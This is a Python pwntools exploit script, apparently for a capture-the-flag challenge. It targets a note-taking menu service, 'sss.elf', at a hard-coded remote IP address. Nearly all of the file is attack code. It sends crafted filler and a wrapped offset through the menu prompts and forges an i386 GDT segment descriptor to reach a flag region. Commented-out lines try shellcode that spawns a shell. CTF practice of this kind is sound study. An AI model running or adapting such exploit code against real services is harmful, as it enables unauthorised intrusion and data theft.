#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./sss.elf
import struct

from pwn import *
# Set up pwntools for the correct architecture
# The binary path can be overridden on the command line (./exploit.py EXE=path);
# binding the ELF to context.binary makes arch/bits/endianness follow its headers.
exe = ELF(args.EXE or './sss.elf')
context.binary = exe
# 'debug' echoes every byte sent and received to the log (same effect as the
# DEBUG command-line switch described below).
context.log_level = 'debug'

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR


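def start(argv=None, *a, **kw):
    '''Start the exploit against the target.

    Args:
        argv: extra command-line arguments placed after the binary path.
              None (the default) means no extra arguments; a fresh list is
              built on every call, so callers never share state.
        *a, **kw: forwarded unchanged to gdb.debug() / process().

    Returns:
        The pwntools tube for the new process: under GDB when the script is
        run with the GDB argument (./exploit.py GDB), a plain process otherwise.
    '''
    # A list literal as the default would be one shared object across calls
    # (mutable-default pitfall); build the command line per call instead.
    cmd = [exe.path] + list(argv or [])
    if args.GDB:
        # gdbscript is assigned at module level further down; it is only
        # looked up here, at call time, so the ordering is fine.
        return gdb.debug(cmd, gdbscript=gdbscript, *a, **kw)
    return process(cmd, *a, **kw)

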
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
# The script places a one-shot breakpoint on the ELF entry point and resumes;
# only `exe` is interpolated, so it is passed explicitly rather than via locals().
gdbscript = '''
tbreak *0x{exe.entry:x}
continue
'''.format(exe=exe)


#===========================================================
|
|
# EXPLOIT GOES HERE
|
|
#===========================================================
|
|
# Arch: i386-32-little
|
|
# RELRO: No RELRO
|
|
# Stack: No canary found
|
|
# NX: NX enabled
|
|
# PIE: No PIE (0x1000)
|
|
# RWX: Has RWX segments
|
|
# Stripped: No
|
|
# Debuginfo: Yes
|
|
|
|
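def create_seg_descriptor(base, limi):
    """Encode an 8-byte i386 GDT data-segment descriptor.

    The layout is fixed by the architecture and always little-endian, so the
    fields are packed with struct rather than the context-dependent p16/p8:
    limit[15:0], base[15:0], base[23:16], access byte, flags|limit[19:16],
    base[31:24].

    Args:
        base: 32-bit linear base address of the segment (masked field by field).
        limi: segment limit in bytes.  G=1 is set below, so the descriptor
              stores the limit in 4 KiB pages: only bits 31:12 of `limi`
              are kept and the low 12 bits are dropped.

    Returns:
        bytes: the 8-byte descriptor.
    """
    # With page granularity the 20-bit limit field is the byte limit >> 12.
    # Both halves of the field must come from this same value; deriving the
    # high nibble from limi >> 16 (byte granularity) while the low word uses
    # limi >> 12 mixes the two conventions and silently inflates the limit.
    limit_pages = (limi >> 12) & 0xfffff

    # Access byte: type=2 (data, read/write), S=1 (code/data segment),
    # DPL=0, P=1 (present).
    stype = 2
    s = 1
    dpl = 0
    present = 1
    access = stype | (s << 4) | (dpl << 5) | (present << 7)

    # Flags nibble: G=1 (4 KiB granularity), D/B=1 (32-bit), with
    # limit[19:16] in the low nibble of the same byte.
    g = 1
    db = 1
    flags = (g << 7) | (db << 6) | ((limit_pages >> 16) & 0xf)

    return struct.pack(
        '<HHBBBB',
        limit_pages & 0xffff,   # limit low
        base & 0xffff,          # base low
        (base >> 16) & 0xff,    # base mid
        access,
        flags,
        (base >> 24) & 0xff,    # base high
    )

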
# Target-specific constants, named as the author chose them.  What each value
# refers to is not derivable from this file alone -- confirm against the binary.
gdt = 0x1000000
kds_base = 0x1000000
utok_add = 0x100000
bytes_read = 127
ucs_off = 0x10
buf_read = 0x4f2c
flag_pos = 0x500000 * 4
retaddr = 0x4e90

# Offset combined from the constants above.  A negative result is wrapped to
# its unsigned 32-bit two's-complement form so it can be packed with p32() later.
val = gdt - kds_base - utok_add - bytes_read + ucs_off
if val < 0:
    val += 2 ** 32

# Base used for the (currently unsent) `ds` descriptor below.
ds_base = 0x4ef4 + 0x1100000 - retaddr

# Target selection: the commented alternatives cover a local process, a wrapper
# script and a local listener; only the last line is active and it points at a
# hard-coded remote host/port.
#io = start()
#io = process('./run.sh')
#io = remote('localhost', 1337)
io = remote('37.27.204.218', 1337)

# First note: choose menu option 1 at the '>' prompt, then answer the 'note?'
# prompt with 98 bytes of filler.  The commented lines are earlier attempts the
# author kept for reference; they are not executed.
io.recvuntil('>')
io.sendline('1')
io.recvuntil('note?')
# io.send('A'*56)
# io.send(p32(flag_pos - ds_base))
# io.send(p32(exe.symbols['userspace_write']))
# io.sendline(cyclic(98-56-8))
io.sendline('D'*98)

# Second note: same menu path, 98 bytes of filler again.
io.recvuntil('>')
io.sendline('1')
io.recvuntil('note?')
io.sendline('B'*98)

# Third note: 4 filler bytes, the 32-bit wrapped offset `val` (packed
# little-endian by p32), then a 119-byte cyclic pattern terminated by sendline.
io.recvuntil('>')
io.sendline('1')
io.recvuntil('note?')


io.send('CCCC')
io.send(p32(val))
# io.send('F'*56)
# io.send(p32(0x10))
# io.send(p32(flag_pos - ds_base))
# io.send(p32(exe.symbols['userspace_write']))
# io.send(b'G'*4)
# io.send(p32(0x10))
# io.send(p32(flag_pos - ds_base))
# io.sendline(cyclic(119-56-12-12))
io.sendline(cyclic(119))

# Menu option 3, wait for the 'remarks' prompt, then send one descriptor built
# by create_seg_descriptor().  `kds` uses the maximum limit (0xffffffff);
# `ds` is computed but never sent in this version of the script.
io.recvuntil('>')
io.sendline('3')
io.recvuntil('remarks')
kds = create_seg_descriptor(flag_pos - 0x100000 - buf_read, 0xffffffff)
ds = create_seg_descriptor(ds_base, 0xfffff)
io.sendline(kds)
# io.send(p32(val))
# io.sendline(cyclic(128 - 1 - 4))
# io.recvuntil('Inserisci la tua nota:')
# io.sendline(cyclic(128))
# io.send('2')
# data = io.recvuntil('Esci')
# print(data)
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

# Hand the connection over to the terminal so whatever the service prints next
# can be read (and further input typed) interactively.
io.interactive()